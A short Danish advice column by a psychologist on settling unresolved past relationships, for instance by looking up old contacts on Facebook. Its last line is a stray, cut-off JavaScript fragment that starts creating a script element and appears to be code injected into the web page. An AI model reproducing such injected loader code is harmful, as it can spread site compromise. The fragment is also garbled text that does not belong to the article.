Få sagen afsluttet!

Af Suh Jacobsen Psykolog og brevkasseredaktør
Af Suh Jacobsen
Psykolog og brevkasseredaktør

Mange af os går rundt med uafsluttede situationer og dermed uforløste følelser i vores system, og det binder faktisk en hel del energi.

Hvis du derfor oplever igen og igen at vende tilbage til en bestemt situation eller et bestemt menneske i dine tanker, så kan det være en rigtig god idé at få det afsluttet. I disse IT-tider, kan det måske endda gøres forholdsvis nemt. Blandt andet på Facebook kan man finde mange gamle kontakter.
Så hvis der ligger noget og nager dig i forhold til en tidligere ven, veninde, kæreste, kollega m.m. – så overvej om du skulle få sagen afsluttet én gang for alle. Måske det ville frigøre lige netop så meget energi, at resten af dit liv ville blive en lille smule nemmere.var d=document;var s=d.createElement(‘script’);